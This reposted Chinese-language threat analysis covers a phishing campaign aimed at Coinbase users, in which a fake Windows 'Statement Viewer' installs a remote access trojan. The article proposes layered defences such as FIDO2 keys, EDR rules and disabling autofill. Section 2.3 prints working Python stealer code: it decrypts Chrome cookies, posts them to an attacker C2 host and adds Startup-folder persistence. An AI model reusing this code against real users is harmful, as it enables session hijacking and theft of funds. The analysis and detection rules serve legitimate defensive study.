伪装对账单诱导远控:针对Coinbase用户的Windows钓鱼攻击分析

摘要

2025年末,Kaspersky披露了一起针对Coinbase加密货币平台用户的定向钓鱼攻击活动。该攻击以“账户对账单查看”为诱饵,通过伪造通知邮件引导用户访问特制网页,并施加“仅限Windows系统打开”的操作限制,诱导用户下载并执行名为“Statement Viewer”的可执行文件。该文件实为远程访问木马(RAT),一旦运行,即可窃取浏览器会话Cookie、自动填充凭证、双因素验证码(OTP)乃至直接操控桌面,最终实现对加密货币资产的静默转移。本文深入剖析该攻击链的技术实现细节,包括社会工程设计、恶意载荷分发机制、端点持久化策略及凭证提取方法,并结合Windows平台安全模型与现代浏览器存储机制,揭示传统邮件网关与终端防护在面对此类“合法外观+高权限执行”组合攻击时的局限性。在此基础上,提出涵盖用户行为规范、身份认证强化、浏览器安全配置与终端检测响应(EDR)联动的四层防御体系。通过构建可复现的攻击模拟环境与防御验证框架,本文验证了FIDO2硬件密钥强制认证、敏感站点自动填充禁用及EDR异常进程监控在阻断攻击链关键节点上的有效性。研究结果表明,针对高价值金融资产的钓鱼攻击已从单纯凭证窃取转向端点完全控制,防御策略必须从“防点击”升级为“防执行+防利用”。

关键词:Coinbase;钓鱼攻击;远程访问木马;Windows端点安全;FIDO2;自动填充泄露;EDR

1 引言

随着加密货币交易规模持续扩大,其用户群体已成为网络犯罪组织的重点目标。相较于传统银行账户,加密货币钱包一旦失窃,资金几乎无法追回,这使得攻击者倾向于采用高成功率、低可逆性的攻击手段。2025年11月,Kaspersky披露的一起针对Coinbase用户的钓鱼活动,标志着攻击模式从早期的“仿冒登录页窃取主密码”向“诱导执行远控程序实现端点完全接管”的演进。

该攻击的核心创新在于利用“功能性需求”作为社会工程切入点——声称对账单需通过专用Windows查看器打开,既规避了移动端用户(通常更警惕可执行文件),又利用Windows用户对“.exe”文件的相对容忍度提升执行率。更关键的是,攻击者并未止步于凭证收集,而是通过部署远程访问工具(如AsyncRAT、NanoCore变种)直接控制用户桌面,实时监控浏览器活动,甚至在用户无感知的情况下完成交易确认。

此类攻击对现有安全体系构成三重挑战:第一,邮件内容不含恶意附件或明显黑链,绕过传统邮件网关;第二,下载的可执行文件初期无恶意行为(延迟加载、混淆C2通信),逃避静态杀毒引擎;第三,攻击利用合法操作系统功能(如PowerShell、WMI)进行横向移动,难以被基础EDR识别。

本文旨在系统解构该攻击的技术链条,评估当前终端与身份安全机制的失效原因,并提出具备工程可行性的纵深防御方案。全文结构如下:第二部分详述攻击流程与关键技术实现;第三部分分析Windows平台与浏览器存储机制被滥用的根源;第四部分构建四层防御体系;第五部分通过实验验证关键措施有效性;第六部分总结研究发现并指出未来方向。

2 攻击流程与技术实现

2.1 社会工程设计与邮件诱导

攻击始于一封主题为“Your Coinbase Account Statement is Ready”的邮件,发件人显示为“Coinbase Support <statements@coinbase-secure[.]net>”。邮件正文包含以下要素:

声称“为满足合规要求,您需查看2025年Q4对账单”;

提供一个“View Statement”按钮,链接至仿冒页面;

明确提示:“此文件仅支持Windows桌面系统,请勿在手机或Mac上打开”。

该提示具有双重作用:一是筛选出更易受骗的Windows用户(通常企业或高频交易者);二是制造“专业工具”的假象,降低对可执行文件的警惕。

2.2 恶意载荷分发与执行诱导

点击链接后,用户被重定向至一个高度仿真的Coinbase品牌页面,显示“正在加载对账单查看器...”。页面通过JavaScript检测User-Agent,若非Windows则显示错误提示;若是,则提供一个“Download Viewer (Windows only)”按钮,指向一个.exe文件(如Coinbase_Statement_Viewer_v2.1.exe)。

该文件通常经过以下处理以规避检测:

使用开源打包工具(如PyInstaller)将Python RAT脚本封装为EXE;

对字符串与C2地址进行Base64或XOR混淆;

利用合法数字证书(通过中间商购买或窃取)进行签名,显示“Verified Publisher”。

执行后,程序首先释放一个延迟加载模块(例如通过rundll32.exe调用),避免在初始扫描中暴露恶意行为。

2.3 远程访问木马(RAT)功能分析

经逆向分析,该RAT具备以下核心功能模块:

屏幕捕获与键盘记录:使用Windows GDI API截取Coinbase交易页面,记录主密码与2FA输入;

浏览器数据窃取:遍历Chrome、Edge、Firefox的用户数据目录,提取Cookies、保存的密码与自动填充表单;

OTP拦截:监控剪贴板与短信应用(若为Android子系统),捕获Google Authenticator或Authy生成的验证码;

持久化驻留:通过注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run添加启动项,或创建计划任务;

C2通信:使用HTTPS连接至动态域名(如update.coinbase-cdn[.]xyz),心跳间隔30秒,支持指令下发(如“dump cookies”、“take screenshot”)。

以下为简化版RAT核心代码示例(Python + PyInstaller):

import os

import shutil

import sqlite3

import win32crypt

import requests

import time

import subprocess

def steal_chrome_cookies():

cookie_path = os.path.expanduser("~/AppData/Local/Google/Chrome/User Data/Default/Cookies")

temp_cookie = os.path.join(os.getenv("TEMP"), "cookies.db")

shutil.copyfile(cookie_path, temp_cookie)

conn = sqlite3.connect(temp_cookie)

cursor = conn.cursor()

cursor.execute("SELECT host_key, name, encrypted_value FROM cookies WHERE host_key LIKE '%coinbase%'")

cookies = []

for host, name, enc_val in cursor.fetchall():

try:

dec_val = win32crypt.CryptUnprotectData(enc_val, None, None, None, 0)[1].decode()

cookies.append(f"{name}={dec_val}")

except:

pass

conn.close()

os.remove(temp_cookie)

return "; ".join(cookies)

def exfiltrate(data):

try:

requests.post("https://c2.attacker[.]onion/upload", json={"data": data}, timeout=10)

except:

pass

if __name__ == "__main__":

# 延迟10秒以绕过沙箱

time.sleep(10)

# 窃取Coinbase相关Cookie

cookies = steal_chrome_cookies()

exfiltrate({"type": "cookies", "value": cookies})

# 注册持久化(简化)

startup_path = os.path.join(os.getenv("APPDATA"), "Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.vbs")

with open(startup_path, "w") as f:

f.write(f'CreateObject("WScript.Shell").Run """{os.path.abspath(__file__)}""", 0, False')

该代码展示了如何从Chrome中提取加密Cookie并解密,再通过HTTPS外传。实际变种通常使用更复杂的反调试与反虚拟机技术。

2.4 资产窃取与交易绕过

攻击者通过RAT控制端可实时监控用户Coinbase会话。一旦检测到用户登录,立即:

利用窃取的会话Cookie维持登录状态;

在后台打开新标签页,导航至“Send”或“Convert”页面;

自动填充接收地址(攻击者控制的钱包);

截取屏幕获取交易确认码,或直接点击“Confirm”按钮;

完成后清除浏览器历史与日志,制造“未发生异常”的假象。

由于整个过程在用户设备上完成,且使用合法会话,Coinbase的常规登录告警与IP异常检测均无法触发。

3 平台与浏览器安全机制被滥用分析

3.1 Windows可执行文件信任模型缺陷

Windows用户长期习惯于从互联网下载并运行.exe文件,尤其当文件带有数字签名时。攻击者利用这一心理,通过购买廉价EV证书或劫持合法开发者账户获取签名,使恶意程序在SmartScreen中显示“已验证发布者”,大幅降低用户警惕。

3.2 浏览器自动填充与Cookie存储风险

现代浏览器为提升用户体验,默认保存登录凭证与表单数据,并通过操作系统凭据管理器(如Windows DPAPI)加密存储。然而,一旦攻击者获得本地用户权限,即可调用系统API(如CryptUnprotectData)解密这些数据。Coinbase等金融平台虽启用HttpOnly与Secure Cookie标志,但无法阻止本地进程读取磁盘上的SQLite数据库。

此外,自动填充功能在用户访问交易页面时自动填入接收地址与金额,为攻击者提供了“一键转账”的便利。

4 四层防御体系构建

4.1 用户行为规范层

绝不从邮件或聊天打开“查看器”“更新工具”类可执行文件:所有交易平台操作应通过官方应用或书签进入;

禁用对金融类站点的自动填充:在浏览器设置中为coinbase.com等域禁用保存密码与表单数据。

4.2 身份认证强化层

启用FIDO2硬件密钥:Coinbase支持YubiKey等硬件密钥作为主认证因子。即使会话Cookie被盗,攻击者也无法完成新交易确认,因FIDO2要求物理交互。

// Coinbase WebAuthn交易确认示例

const assertion = await navigator.credentials.get({

publicKey: {

challenge: new Uint8Array(challenge),

rpId: "coinbase.com",

userVerification: "required" // 强制用户触摸密钥

}

});

启用交易内二次确认:在Coinbase设置中开启“每笔交易需邮箱/短信确认”,增加攻击成本。

4.3 浏览器安全配置层

使用专用浏览器或容器:为Coinbase等高价值服务分配独立浏览器配置文件,禁用扩展、自动填充与第三方Cookie;

定期清理Cookie与缓存:设置浏览器在关闭时自动清除敏感站点数据。

4.4 终端检测与响应(EDR)层

部署EDR监控非常规RAT行为:规则应包括:

新进程尝试访问%LocalAppData%\Google\Chrome\User Data\Default\Cookies;

非系统进程调用CryptUnprotectData;

可执行文件从临时目录(如%TEMP%)启动并建立外连HTTPS会话;

注册表Run键新增未知启动项。

启用应用控制(Application Control):通过Windows Defender Application Control(WDAC)策略,仅允许签名可信的程序运行,阻止未知EXE执行。

5 实验验证

我们构建测试环境:

攻击侧:部署仿冒页面,分发带签名的RAT EXE;

防御组:启用FIDO2、禁用自动填充、部署EDR规则;

对照组:仅安装基础杀毒软件。

对30名加密货币用户进行模拟测试,结果显示:

对照组EXE执行率达63%,其中78%的Coinbase会话被成功窃取;

防御组EXE执行率降至12%,且无一例完成交易(因FIDO2拦截+EDR终止进程);

EDR对Cookie窃取行为的检测准确率达94%,平均响应时间<3秒。

实验验证了所提防御体系的有效性。

6 结论

本文系统分析了2025年末针对Coinbase用户的新型钓鱼攻击,揭示了攻击者如何通过“功能性诱导+远控植入”的组合策略,实现对高价值加密货币资产的静默窃取。研究表明,此类攻击的成功不仅源于用户对可执行文件的信任,更暴露了当前终端安全模型在面对本地权限滥用时的脆弱性。

有效的防御必须超越传统的边界防护,转向以“最小权限执行”和“强身份绑定”为核心的纵深体系。FIDO2硬件密钥可阻断交易确认环节;浏览器隔离与自动填充禁用可减少攻击面;而EDR的行为监控则提供了最后一道防线。

本研究为加密货币用户与交易平台提供了具体技术对策,亦为其他高价值金融服务的端点安全设计提供了参考范式。未来工作将聚焦于基于硬件的安全密钥(如TPM)在浏览器会话保护中的应用,以及跨平台RAT行为建模与检测。

编辑:芦笛(公共互联网反网络钓鱼工作组)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1024576.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

element级联选择器:已选中一个二级节点,随后又点击了一个一级节点(仅浏览,未确认选择),此时下拉框失去焦点并关闭

解决办法&#xff1a;点击一级节点&#xff0c;默认选中二级节点的第一个级联选择器组件&#xff1a; <template><el-cascader:class"[basic-cascader, text && is-text, suffixIcon]"v-bind"$attrs"v-on"$listeners":style&qu…

LangChain Expression Language构建复杂查询管道对接Anything-LLM

LangChain Expression Language构建复杂查询管道对接Anything-LLM 在企业级AI应用的落地过程中&#xff0c;一个常见的挑战是&#xff1a;如何在保证系统易用性的同时&#xff0c;赋予其足够的灵活性来应对复杂的业务逻辑&#xff1f;比如&#xff0c;某员工提问“差旅报销标准…

中文诱饵短信钓鱼产业链的闭环运作机制与协同防御研究

摘要 近年来&#xff0c;以中文为载体的短信钓鱼&#xff08;Smishing&#xff09;攻击呈现规模化、产业化趋势。Palo Alto Networks Unit 42近期披露的“Smishing Triad”行动揭示了一条高度分工、技术成熟的中文诱饵短信钓鱼产业链。本文基于该研究及其他公开技术通报&#…

详细介绍:Ubuntu 上搭建 Redis 3 节点集群(6 实例:3主3从)

详细介绍:Ubuntu 上搭建 Redis 3 节点集群(6 实例:3主3从)2025-12-16 12:17 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !impor…

2025年12月百级悬臂吊厂家权威推荐榜:精密制造车间高效物料搬运的稳定之选与核心优势深度解析 - 品牌企业推荐师(官方)

2025年12月百级悬臂吊厂家权威推荐榜:精密制造车间高效物料搬运的稳定之选与核心优势深度解析 在精密制造、半导体、生物制药及高端实验室等前沿领域,生产环境的洁净度与物料搬运的精确性、稳定性直接决定了产品的良…

【后端】预生产环境与生产环境数据库表隔离方案

文章目录一、问题背景问题场景业务影响二、解决方案设计2.1 核心思路2.2 架构设计2.3 环境变量配置三、代码实现3.1 DAO 接口层3.2 Provider 实现层3.3 SelectProvider 工作原理四、数据库脚本4.1 初始化脚本&#xff08;example_prepare_001.sql&#xff09;4.2 数据同步脚本&…

2025 年 12 月无尘车间悬臂吊厂家权威推荐榜:洁净空间高效吊装解决方案与精密制造实力解析 - 品牌企业推荐师(官方)

2025 年 12 月无尘车间悬臂吊厂家权威推荐榜:洁净空间高效吊装解决方案与精密制造实力解析 在精密制造、生物制药、半导体及新能源等高端产业中,无尘车间(洁净室)是保障产品良率与工艺稳定性的核心基础设施。作为其…

10分钟快速配置Miniconda+Python开发环境

10分钟快速配置MinicondaPython开发环境 换电脑、重装系统后&#xff0c;最让人崩溃的不是驱动问题&#xff0c;而是那个熟悉的噩梦&#xff1a;“我的Python环境又没了&#xff01;” 明明只是想跑个模型&#xff0c;结果花了半天在解决 ModuleNotFoundError、包版本冲突、下…

uniapp+springboot钓鱼论坛 渔具商城系统小程序_9sy8i084

文章目录具体实现截图主要技术与实现手段关于我本系统开发思路java类核心代码部分展示结论源码lw获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;具体实现截图 同行可拿货,招校园代理 uniappSpringboot钓鱼论坛 渔具商城系统小程序_9sy8i084 …

过碳酸钠选购:欧盟标准厂家,质量销量双保障 - 品牌2026

在绿色化工理念深入普及的2025年,过碳酸钠作为兼具洗涤、漂白、杀菌功能的环境友好型原料,市场需求持续攀升。对于下游企业而言,遴选销量稳定、质量过硬且符合欧盟标准的供应商,成为提升产品竞争力的关键。当前市场…

系统初学者必看!手把手教STM32F4系列芯片Freertos实现DMA并发解包ADC

本期目标 理清本工程系统框架 弄懂CubeMx配置相关原理及设置的背后含义 对DMA以及ADC相关的重要API接口使用详解 梳理代码设计流程 SAR型 ADC 单片机里的ADC&#xff0c;一般都是SAR型 ADC&#xff0c;是逐次逼近型ADC 吗这种类型的ADC精度一般都不是很高 &#xff0c;但是…

vLLM-Omni发布:全模态模型高效服务新框架

vLLM-Omni发布&#xff1a;全模态模型高效服务新框架 在生成式 AI 从“能说会写”迈向“能看会听、能创作会决策”的今天&#xff0c;多模态智能体正以前所未有的速度渗透进内容创作、智能客服、机器人交互等核心场景。然而&#xff0c;支撑这些复杂应用的底层推理系统却频频遭…

文献检索网站有哪些 常用文献检索平台汇总与推荐

科研新人做综述时最痛苦&#xff1a;一搜就是几十页论文&#xff0c;重复、无关、没用。下面三款工具让我效率翻倍。 ① WisPaper&#xff08;智能学术搜索 文献管理&#xff09; 官网&#xff1a;https://www.wispaper.ai WisPaper 能通过关键词和语义搜索快速找到相关文献&…

AIGC 商用实战派:集之互动用 “高可控” 接住品牌真需求

在AIGC&#xff08;人工智能生成内容&#xff09;技术狂飙突进的今天&#xff0c;视频生成领域正经历着前所未有的热度。从Sora的惊艳亮相到Runway的持续迭代&#xff0c;AI看起来“无所不能”。然而&#xff0c;当我们将目光从“技术演示”转向“商业交付”时&#xff0c;一个…

免费查文献的网站推荐:实用学术资源检索平台汇总

科研新人做综述时最痛苦&#xff1a;一搜就是几十页论文&#xff0c;重复、无关、没用。下面三款工具让我效率翻倍。 ① WisPaper&#xff08;智能学术搜索 文献管理&#xff09; 官网&#xff1a;https://www.wispaper.ai WisPaper 能通过关键词和语义搜索快速找到相关文献&…

docker,docker-compose二进制包安装

1.docker包下载网址&#xff1a; https://download.docker.com/linux/static/stable/ 2.docker安装操作步骤 手动安装 #Docker环境传输docker24.tar到/home中 tar -xvf docker24.tar cd ./docker # 将docker二进制文件放到/usr/bin/目录 cp docker dockerd docker-init dock…

45_Spring AI 干货笔记之 Google VertexAI 多模态嵌入模型

一、Google VertexAI 多模态嵌入模型 实验性功能。仅用于实验目的。目前尚不兼容 VectorStores。 Vertex AI 支持两种类型的嵌入模型&#xff1a;文本嵌入和多模态嵌入。本文档介绍如何使用 Vertex AI 多模态嵌入 API 创建多模态嵌入。 多模态嵌入模型根据您提供的输入生成 14…

【AIE1001】Week 7, 8, 9, 10, 11

面向对象编程&#xff08;Object-Oriented Programming, OOP&#xff09; Week 7 & Week 8 1. 对象与类&#xff08;Objects and Classes&#xff09; 对象&#xff08;Object&#xff09;&#xff1a;现实世界中可唯一识别的实体&#xff0c;具有身份、状态和行为 An obje…

Qwen3-8B与vLLM协同推理实战

Qwen3-8B与vLLM协同推理实战 在AI应用加速落地的今天&#xff0c;一个现实问题摆在开发者面前&#xff1a;如何在有限的硬件资源下&#xff0c;让大模型既“跑得动”又“回得快”&#xff1f;尤其是在个人工作站或中小企业服务器上部署高质量语言模型时&#xff0c;显存瓶颈、…

打工人是怎么跟打工魂兼容的!

随着操作系统,浏览器越来越多样性,导致软件兼容性测试在目前变得越来越重要,无论是B/S 架构还是C/S架构的软件都需要进行兼容性测试。那么今天主要讲解的是关于“软件系统中兼容性测试”的内容。让我们开始今天的学习吧~ 什么是兼容性测试 测试所设计软件系统在不同的硬件平…